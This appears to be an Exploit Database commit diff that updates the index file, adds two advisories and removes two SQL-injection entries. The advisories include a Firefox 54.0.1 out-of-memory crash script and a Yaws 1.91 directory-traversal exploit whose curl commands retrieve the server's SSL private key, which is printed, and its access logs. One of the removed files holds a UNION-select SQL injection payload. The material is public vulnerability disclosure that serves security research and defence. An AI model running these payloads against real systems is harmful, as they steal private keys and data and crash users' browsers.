DB: 2017-07-08

2 new exploits

Firefox 54.0.1 - Denial of Service

Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution
Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution
Yaws 1.91 - Remote File Disclosure
Price Comparison Script 2017.1.8 - SQL Injection
Clickbank Affiliate Marketplace Script 2017 - SQL Injection

files.csv

@@ -5608,6 +5608,7 @@ id,file,description,date,author,platform,type,port
 42299,platforms/linux/dos/42299.txt,"LibTIFF - 'tif_dirwrite.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
 42300,platforms/linux/dos/42300.txt,"LibTIFF - 'tif_jbig.c' Denial of Service",2017-07-06,"team OWL337",linux,dos,0
 42301,platforms/linux/dos/42301.txt,"LibTIFF - '_TIFFVGetField (tiffsplit)' Out-of-Bounds Read",2017-07-06,zhangtan,linux,dos,0
+42302,platforms/windows/dos/42302.txt,"Firefox 54.0.1 - Denial of Service",2017-07-07,hyp3rlinx,windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -15685,7 +15686,8 @@ id,file,description,date,author,platform,type,port
 42283,platforms/java/remote/42283.rb,"ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)",2017-06-29,Metasploit,java,remote,0
 42288,platforms/android/remote/42288.txt,"BestSafe Browser - MITM Remote Code Execution",2017-06-30,intern0t,android,remote,0
 42296,platforms/unix/remote/42296.rb,"GoAutoDial 3.3 - Authentication Bypass / Command Injection (Metasploit)",2017-07-05,Metasploit,unix,remote,443
-42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution",2017-07-05,mr_me,php,remote,7778
+42297,platforms/php/remote/42297.py,"Lepide Auditor Suite - 'createdb()' Web Console Database Injection / Remote Code Execution",2017-07-05,mr_me,php,remote,7778
+42303,platforms/multiple/remote/42303.txt,"Yaws 1.91 - Remote File Disclosure",2017-07-07,hyp3rlinx,multiple,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37873,8 +37875,6 @@ id,file,description,date,author,platform,type,port
 41572,platforms/hardware/webapps/41572.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Session Stealing",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
 41573,platforms/hardware/webapps/41573.txt,"ASUSWRT RT-AC53 (3.0.0.4.380.6038) - Remote Code Execution",2017-03-08,"Bruno Bierbaumer",hardware,webapps,0
 41574,platforms/xml/webapps/41574.html,"FTP Voyager Scheduler 16.2.0 - Cross-Site Request Forgery",2017-03-10,hyp3rlinx,xml,webapps,52986
-41575,platforms/php/webapps/41575.txt,"Price Comparison Script 2017.1.8 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
-41576,platforms/php/webapps/41576.txt,"Clickbank Affiliate Marketplace Script 2017 - SQL Injection",2017-03-10,"Ihsan Sencan",php,webapps,0
 41577,platforms/jsp/webapps/41577.txt,"Kinsey Infor/Lawson / ESBUS - SQL Injection",2017-03-10,"Michael Benich",jsp,webapps,0
 41579,platforms/xml/webapps/41579.html,"WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery",2017-03-10,KoreLogic,xml,webapps,0
 41578,platforms/cgi/webapps/41578.txt,"dnaLIMS DNA Sequencing - Directory Traversal / Session Hijacking / Cross-Site Scripting",2017-03-10,"Shorebreak Security",cgi,webapps,0

platforms/multiple/remote/42303.txt

@@ -0,0 +1,126 @@
+[+] Credits: John Page aka hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/YAWS-WEB-SERVER-v1.91-UNAUTHENTICATED-REMOTE-FILE-DISCLOSURE.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+==========
+yaws.hyber.org
+
+
+
+Product:
+===========
+Yaws v1.91 (Yet Another Web Server)
+
+Yaws is a HTTP high perfomance 1.1 webserver particularly well suited for dynamic-content web applications.
+Two separate modes of operations are supported:
+
+Standalone mode where Yaws runs as a regular webserver daemon. This is the default mode.
+Embedded mode where Yaws runs as an embedded webserver in another Erlang application.
+
+
+
+Vulnerability Type:
+===================
+Unauthenticated Remote File Disclosure
+
+
+
+CVE Reference:
+==============
+CVE-2017-10974
+
+
+
+Security Issue:
+================
+Remote attackers who can reach Yaws web server can read the server SSL private key file using directory
+traversal attacks, access logs are also disclosed etc... this version is somewhat old, however, still avail for download
+as of the time of this writing. http://yaws.hyber.org/download/
+
+
+
+Exploit/POC:
+=============
+Steal Yaws Server SSL private key ".pem" file.
+
+curl http://REMOTE-VICTIM-IP:8080/%5C../ssl/yaws-key.pem
+
+
+-----BEGIN RSA PRIVATE KEY-----
+MIICWwIAAAKBgQDMJHAcJXB9TzkYg/ghXNjOAp3zcgKC4XZo4991SPGYukKVU1Fv
+RX0YgPx3wz8Ae7ykPg0KW7O3D9Pn8liazTYEaXskNKAzOFr1gtBd7p937PKNQk++
+3/As5EfJjz+lBrwUGbSicJgldJk3Cj89htMUqGwL2Bl/yOQIsZtyLlrP1wIDAQAB
+AoGAYgEwTWLwAUjSaWGs8zJm52g8Ok7Gw+CfNzYG5oCxdBgftR693sSmjOgHzNtQ
+WMQOyW7eDBYATmdr3VPsk8znHBSfQ19gAJjR89lJ6lt5qDMNtXMUWILn91g+RbkO
+gmTkhD8uc0e/3FJBwPxFJWQzFEcAR4jNFJwhNzg6CO8CK/ECQQD7sNzvMRnUi1RQ
+tiKgRxdjdEwNh52OUPwuJWhKdBLIpHBAJxCBHJB+1N0ufpqaEgUfJ5+gEYrBRMJh
+aTCIJul5AkEAz6MsmkMz6Iej5zlKrlDL5q6GU+wElXK/F1H8tN/JchoSXN8BRCJZ
+DLpK0mcMN4yukHKDCo0LD9NBlRQFDll/zwJASb2CrW2kVLpRhKgoMu9BMflDwv8G
+IcqmZ9q72HxzeGd9H76SPlGhIBe7icC8CQHYkE0qnlolXgSIMsP/3RQReQJAYHnt
++INvNAUKSB6br6EFDNtcuNO6UYJufbRvmc89d5HbpGFN4k2fWMWajGarC4iHd8Bt
+WNKuKB09pLoXm1JEiwJAfRtIXE6sr4MQOL6aWwGElw+Yb4B1WBhBiPRRwGTX0nzN
+HXF3851+kgZBZjjzA3Ib2nr5PeXkZBBLE/4jJvRPRA==
+-----END RSA PRIVATE KEY-----
+
+
+
+--- OR Read the access logs. ---
+
+
+curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access  
+
+<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY>
+<H1>Not Found</H1>The requested URL /../logs/localhost.8080.access was not found on this server.<P><HR>
+<address> Yaws 1.91 Server at localhost:8080 </address>  </BODY></HTML>[root@localhost ~]# 
+
+Then,
+
+
+curl http://REMOTE-VICTIM-IP:8080/%5C../logs/localhost.8080.access
+
+127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET / HTTP/1.1" 200 74419 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /stil.css HTTP/1.1" 200 1677 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_head.gif HTTP/1.1" 200 2308 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_pb.gif HTTP/1.1" 200 1444 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+127.0.0.1 - - [26/Jun/2017:09:52:27 -0400] "GET /icons/yaws_y.gif HTTP/1.1" 200 4831 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+127.0.0.1 - - [26/Jun/2017:09:52:33 -0400] "GET /bindings.yaws HTTP/1.1" 200 5502 "http://127.0.0.1:8080/" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+127.0.0.1 - - [26/Jun/2017:09:52:42 -0400] "GET /configuration.yaws HTTP/1.1" 200 8634 "http://127.0.0.1:8080/bindings.yaws" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0"
+
+etc...
+
+
+
+Network Access:
+===============
+Remote
+
+
+
+
+Severity:
+=========
+High
+
+
+
+Disclosure Timeline:
+=================================
+Vendor Notification: June 26, 2017
+No replies
+July 7, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

platforms/php/webapps/41575.txt

@@ -1,22 +0,0 @@
-# # # # # 
-# Exploit Title: Price Comparison Script v2017.1.8 - SQL Injection
-# Google Dork: N/A
-# Date: 10.03.2017
-# Vendor Homepage: https://www.axisitp.com/
-# Software: https://www.axisitp.com/price-comparison-script.php
-# Demo: http://www.pricecomparisonscript.info/
-# Version: 2017.1.8
-# Tested on: Win7 x64, Kali Linux x64
-# # # # # 
-# Exploit Author: Ihsan Sencan
-# Author Web: http://ihsan.net
-# Author Mail : ihsan[@]ihsan[.]net
-# # # # #
-# SQL Injection/Exploit :
-# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
-# http://localhost/[PATH]/compare.php?pid=[SQL]
-# For example;
-# -100'+/*!50000union*/+select+1,2,3,4,0x496873616e2053656e63616e203c62723e207777772e696873616e2e6e6574,6,database(),8,9,10,11,12,13,14,15,16,17,18,19,20--+-
-# axisitp_newpcs
-# Etc..
-# # # # #

platforms/php/webapps/41576.txt

@@ -1,18 +0,0 @@
-# # # # # 
-# Exploit Title: Clickbank Affiliate Marketplace Script v2017 - SQL Injection
-# Google Dork: N/A
-# Date: 10.03.2017
-# Vendor Homepage: https://www.axisitp.com/
-# Software: https://www.axisitp.com/clickbank-affiliate-marketplace-script.php
-# Demo: http://www.clickbank.axisitp.com/
-# Version: 2017
-# Tested on: Win7 x64, Kali Linux x64
-# # # # # 
-# Exploit Author: Ihsan Sencan
-# Author Web: http://ihsan.net
-# Author Mail : ihsan[@]ihsan[.]net
-# # # # #
-# SQL Injection/Exploit :
-# http://localhost/[PATH]/merchantratings.php?merchantid=[SQL]
-# Etc..
-# # # # #

platforms/windows/dos/42302.txt

@@ -0,0 +1,89 @@
+[+] Credits: John Page aka hyp3rlinx	
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/FIREFOX-v54.0.1-DENIAL-OF-SERVICE.txt
+[+] ISR: ApparitionSec            
+ 
+
+
+Vendor:
+===============
+www.mozilla.org
+
+
+
+Product:
+===============
+Firefox v54.0.1
+
+
+
+Vulnerability Type:
+===================
+Denial Of Service
+
+
+
+Security Issue:
+================
+Dynamically creating HTML elements IMG,FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA and assigning very long string of junk chars to the
+"style.color" property results in Firefox Browser out of memory crash (not tab crash).
+
+Tested on Windows 7
+
+References:
+https://bugzilla.mozilla.org/show_bug.cgi?id=1376692#a465096_417288
+
+
+Exploit/POC:
+=============
+<html>
+<body>
+<script>
+
+var p1 = "\x41";
+for (var c=0;c<0xC350;c++){
+p1+="\x41";
+}
+var p2="\x41";
+for (c=0;c<0x1388;c++){
+p2 += p1;
+}		 
+var el = document.createElement('img')  //FORM,DIV,P,A,H2,IFRAME,TABLE,TEXTAREA  //<=== OR any of these elements.
+el.style.color=p2
+document.body.appendChild(el)
+		  
+</script>
+</body>
+
+</html>
+
+
+Network Access:
+===============
+Remote
+
+
+
+Severity:
+=========
+Medium
+
+
+
+
+Disclosure Timeline:
+=============================
+Vendor Notification: June 27, 2017
+July 7, 2017  : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx